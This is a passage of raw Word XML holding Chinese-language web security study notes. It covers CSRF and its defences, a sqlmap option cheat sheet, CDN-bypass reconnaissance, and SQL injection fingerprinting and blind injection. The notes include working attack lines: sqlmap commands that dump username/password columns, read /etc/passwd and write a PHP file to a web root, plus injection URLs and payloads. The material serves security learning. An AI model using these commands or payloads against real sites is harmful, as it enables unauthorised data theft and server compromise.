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D10B" w14:textId="77777777" w:rsidR="004E64AE" w:rsidRDefault="004E64AE" w:rsidP="00E67694">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:color w:val="494949"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:t xml:space="preserve">Csrf  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击者盗用了你的身份，以你的名义发送恶意请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="494949"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C289D" w14:textId="2CC8C946" w:rsidR="008E47AE" w:rsidRDefault="004E64AE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4E64AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登录受信任网站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A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，并在本地生成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Cookie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。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2.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在不登出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A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的情况下，访问危险网站</w:t>
      </w:r>
      <w:r w:rsidRPr="004E64AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE5261" w14:textId="450B25CF" w:rsidR="004E64AE" w:rsidRDefault="004E64AE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57B6567B" w14:textId="6CC5980F" w:rsidR="004E64AE" w:rsidRDefault="004E64AE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改用</w:t>
      </w:r>
      <w:r w:rsidR="0049007D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只接受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post</w:t>
      </w:r>
      <w:r w:rsidR="0049007D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="0049007D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49007D"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</w:p>
    <w:p w14:paraId="73676631" w14:textId="60C8519F" w:rsidR="0049007D" w:rsidRDefault="0049007D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7FF02948" w14:textId="25DCF5E0" w:rsidR="0049007D" w:rsidRDefault="0049007D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在提交表单进行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hash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加密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在服务端进行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hash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验证</w:t>
      </w:r>
      <w:r w:rsidR="0096307A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96307A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00D85097">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果用户</w:t>
      </w:r>
      <w:r w:rsidR="00D85097">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidR="00D85097">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>没有被盗取</w:t>
      </w:r>
      <w:r w:rsidR="0096307A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D16BFE" w14:textId="0417D9FF" w:rsidR="00E11FA5" w:rsidRDefault="00E11FA5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2212CB1A" w14:textId="77777777" w:rsidR="00AA7AAD" w:rsidRDefault="00AA7AAD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045CE164" w14:textId="6FF2A92D" w:rsidR="00E11FA5" w:rsidRDefault="00E67694" w:rsidP="00E6769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Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15617CD1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-u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注入点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCCD71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-f #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指纹判别数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25625333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-b #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获取数据库版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E9BA0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-p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指定可测试的参数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(?page=1&amp;id=2 -p “page,id”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594529A2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-D “”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指定数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B03E4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-T “”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指定表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B12C14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-C “”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指定字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F4C479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-s “” #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保存注入过程到一个文件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,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还可中断，下次恢复在注入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(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保存：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-s “xx.log”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 xml:space="preserve">　　恢复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:-s “xx.log” –resume)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23221B31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columns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列出字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E79FA58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current-user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获取当前用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885F01D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current-db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获取当前数据库名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255962FA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users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列数据库所有用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136CD82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passwords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数据库用户所有密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76F95F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privileges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查看用户权限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(–privileges -U root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549A92D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-U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指定数据库用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EBD9E5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FF0000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dbs #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列出所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC31A24" w14:textId="04130907" w:rsid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 w:hint="eastAsia"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>–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tables -D “” #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列出指定数据库中的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE9DF7" w14:textId="694DF50F" w:rsidR="00802C0C" w:rsidRDefault="00802C0C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7AFE23FD" w14:textId="77777777" w:rsidR="00802C0C" w:rsidRPr="00802C0C" w:rsidRDefault="00802C0C" w:rsidP="00802C0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i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>-v #</w:t>
      </w:r>
      <w:r w:rsidRPr="00802C0C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>详细的等级</w:t>
      </w:r>
      <w:r w:rsidRPr="00802C0C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>(0-6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B7A430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0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：只显示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Python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的回溯，错误和关键消息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2281E7" w14:textId="77777777" w:rsidR="00802C0C" w:rsidRPr="00802C0C" w:rsidRDefault="00802C0C" w:rsidP="00802C0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1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：显示信息和警告消息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE6B29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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00802C0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：显示调试消息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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1F87D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3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：有效载荷注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376678CD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4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：显示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HTTP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请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71351C73" w14:textId="77777777" w:rsidR="00802C0C" w:rsidRP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5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：显示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HTTP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响应头。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF1E08" w14:textId="1D9148A9" w:rsidR="00802C0C" w:rsidRDefault="00802C0C" w:rsidP="00802C0C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02C0C"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6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：显示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HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00802C0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>响应页面的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2609EDE3" w14:textId="77777777" w:rsidR="00802C0C" w:rsidRDefault="00802C0C" w:rsidP="004E64AE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3DCEE00F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1.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读取数据库版本，当前用户，当前数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447685CD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test.php?p=2 -f -b –current-user –current-db -v 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7E7F6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2.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判断当前数据库用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A7DB7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 xml:space="preserve">sqlmap -u http://www.91ri.org/ test.php?p=2 –privileges -U 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用户名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 xml:space="preserve"> -v 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205BBE8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 xml:space="preserve">sqlmap -u http://www.91ri.org/ test.php?p=2 –is-dba -U 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用户名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 xml:space="preserve"> -v 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410698CF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3.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读取所有数据库用户或指定数据库用户的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35211BC2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–users –passwords -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232C428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–passwords -U root -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C14D7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4.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获取所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED83B91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–dbs -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872241C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5.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获取指定数据库中的所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE023E8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–tables -D mysql -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACE5E09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6.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获取指定数据库名中指定表的字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FA688B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–columns -D mysql -T users -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76897E46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7.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获取指定数据库名中指定表中指定字段的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE4535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–dump -D mysql -T users -C “username,password” -s “sqlnmapdb.log” -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571CCD0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8.file-read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读取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web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文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAF0C5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–file-read “/etc/passwd” -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983B205" w14:textId="77777777" w:rsidR="00890D47" w:rsidRP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9.file-write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写入文件到</w:t>
      </w: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web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A7741" w14:textId="28C59E5F" w:rsidR="00890D47" w:rsidRDefault="00890D47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890D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="494949"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sqlmap -u http://www.91ri.org/ test.php?p=2 –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40596CEA" w14:textId="41B43502" w:rsidR="00232420" w:rsidRDefault="00232420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39626C10" w14:textId="0FD86F97" w:rsidR="00232420" w:rsidRDefault="00232420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7D3DBC28" w14:textId="44685599" w:rsidR="00232420" w:rsidRDefault="00232420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71A8AD37" w14:textId="6F0A00A0" w:rsidR="00232420" w:rsidRDefault="00232420" w:rsidP="00890D47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08851D7A" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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23242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被动信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C876EE" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00E67694">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00232420">
        <w:t xml:space="preserve">域名收集 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26878FB5" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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收集其子域名：常用工具和方法，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0E759" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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子域名扫描工具，如：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layer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kali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下的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fierce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（首先</w:t>
      </w:r>
      <w:r w:rsidRPr="00232420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尝试域传送漏洞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，如果不成功再尝试暴力破解）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD81DF1" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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、爬虫爬取页面源代码中的子域名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如：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burp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带的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Spider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等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0193DF" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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2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、在线子域名查询网站、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hyperlink r:id="rId7" w:history="1">
        <w:r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T00ls</w:t>
        </w:r>
      </w:hyperlink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、站长之家，</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r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等</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6992AC73" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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hyperlink r:id="rId9" w:history="1">
        <w:r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HTTPS</w:t>
        </w:r>
      </w:hyperlink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证书搜集、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反查、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE9AD5" w14:textId="3B9BBAE2" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="1F090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6A0D18" wp14:editId="1BDE5626">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="矩形 1" descr="C:\Users\77843\AppData\Roaming\Typora\typora-user-images\1553436550779.png?lastModify=1553605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96539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9fO5kIAwAAH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14:paraId="6EB6BC29" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00E67694">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00232420">
        <w:t>查找其真实ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D687A" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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23242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验证是否存在</w:t>
      </w:r>
      <w:r w:rsidRPr="0023242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 xml:space="preserve">CDN </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617E0CA0" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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nslookup url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，存在的或返回多个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相反返回一个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</w:p>
    <w:p w14:paraId="3BB73D27" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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多地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ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1D1A3" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00613353" w:rsidP="00232420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hyperlink r:id="rId10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http://ping.chinaz.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63C45D90" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00613353" w:rsidP="00232420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hyperlink r:id="rId11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http://ping.aizhan.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00232420"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hyperlink r:id="rId12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http://ce.cloud.360.cn/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F46472F" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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使用各种其他工具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，直接查询是否使用了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CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4625C92A" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00613353" w:rsidP="00232420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hyperlink r:id="rId13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http://www.cdnplanet.com/tools/cdnfinder/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00232420"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hyperlink r:id="rId14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http://www.ipip.net/ip.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32A32A19" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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23242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绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="0023242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CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892D2C1" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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查看域名和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绑定的历史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可能存在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CDN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的记录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相关网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC0F80" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00613353" w:rsidP="00232420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hyperlink r:id="rId15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https://dnsdb.io/zh-cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00232420"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hyperlink r:id="rId16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https://x.threatbook.cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00232420"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hyperlink r:id="rId17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http://toolbar.netcraft.com/site_report?url</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00232420"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= </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00232420" w:rsidRPr="00232420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  <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://viewdns.info/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2ADB9617" w14:textId="77777777" w:rsidR="00232420" w:rsidRPr="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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查询子域名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毕竟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很多小站点又跟主站在同一台服务器或者同一个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段内，此时就可以通过查询子域名对应的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IP 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来辅助查找网站的真实</w:t>
      </w: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</w:p>
    <w:p w14:paraId="4519BC1C" w14:textId="1C975138" w:rsidR="00232420" w:rsidRDefault="00232420" w:rsidP="00232420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23242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利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741399F2" w14:textId="2F05D97E" w:rsidR="00ED55F0" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F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0E7584ED" w14:textId="4D793CE2" w:rsidR="00ED55F0" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F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3F217A33" w14:textId="0259D70A" w:rsidR="00ED55F0" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F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4B9B4C4F" w14:textId="77777777" w:rsidR="00ED55F0" w:rsidRPr="00232420" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F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6DC6FED2" w14:textId="7A4A361A" w:rsidR="00232420" w:rsidRDefault="00E07799" w:rsidP="00ED55F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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidR="00ED55F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A8CA4" w14:textId="38BA1FC4" w:rsidR="00E07799" w:rsidRDefault="00E07799" w:rsidP="00E07799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库类型判断，</w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般asp</w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网站大部分是ac</w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或者 </w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="006647AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="003B0B15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247DAC3" w14:textId="6AD526DB" w:rsidR="00AE613C" w:rsidRDefault="00AE613C" w:rsidP="00E0779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http://www.mytest.com/showdetail.asp?id=49 ;and user&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20676136" w14:textId="0EB62535" w:rsidR="00E07799" w:rsidRDefault="00AE613C" w:rsidP="00E07799">
      <w:pPr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如果错误提示没有关闭，会报出用户名，</w:t>
      </w:r>
      <w:r w:rsidR="00C95168">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r w:rsidR="00C95168">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidR="00C95168">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>账号的话，会提示</w:t>
      </w:r>
      <w:r w:rsidR="008E6A9F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>‘’</w:t>
      </w:r>
      <w:r w:rsidR="00C95168">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dbo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98A08F" w14:textId="77777777" w:rsidR="00A34A1E" w:rsidRPr="00A34A1E" w:rsidRDefault="00A34A1E" w:rsidP="00A34A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A1E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from sysobjects)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30545F66" w14:textId="77777777" w:rsidR="00A34A1E" w:rsidRPr="00A34A1E" w:rsidRDefault="00A34A1E" w:rsidP="00A34A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A1E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from msysobjects)&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC908A" w14:textId="77777777" w:rsidR="00A34A1E" w:rsidRPr="00A34A1E" w:rsidRDefault="00A34A1E" w:rsidP="00A34A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A1E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果数据库是SQLServer，那么第一个网址的页面与原页面http://www.mytest.com/showdetail.asp?id= 49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA1D8B9" w14:textId="77777777" w:rsidR="00A34A1E" w:rsidRPr="00A34A1E" w:rsidRDefault="00A34A1E" w:rsidP="00A34A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A1E">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提示时的验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652D7B5" w14:textId="49D4C4E4" w:rsidR="00E07799" w:rsidRPr="00A34A1E" w:rsidRDefault="00E07799" w:rsidP="00A34A1E">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2F18E7" w14:textId="77777777" w:rsidR="00E07799" w:rsidRDefault="00E07799" w:rsidP="00E07799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3525FAF6" w14:textId="77777777" w:rsidR="00E07799" w:rsidRPr="00E07799" w:rsidRDefault="00E07799" w:rsidP="00E07799">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBC45DF" w14:textId="7517A468" w:rsidR="00ED55F0" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F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基于bool的盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270B1C0C" w14:textId="4B807F89" w:rsidR="004449E7" w:rsidRDefault="004449E7" w:rsidP="004449E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注入方法都需要网页可以显示查询数据的结果，而盲注适合页面不显示任何数据查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43011BE1" w14:textId="06D65B46" w:rsidR="00ED55F0" w:rsidRDefault="004449E7" w:rsidP="004449E7">
      <w:pPr>
        <w:rPr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1' and length(database())&gt;5#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71390082" w14:textId="15EA5865" w:rsidR="00ED55F0" w:rsidRDefault="00ED55F0" w:rsidP="00ED55F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联合查询的注入 </w:t>
      </w:r>
      <w:r w:rsidR="00553991">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（字符型和数字型</w:t>
      </w:r>
      <w:r w:rsidR="00D60E39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，搜索型注入</w:t>
      </w:r>
      <w:r w:rsidR="00553991">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
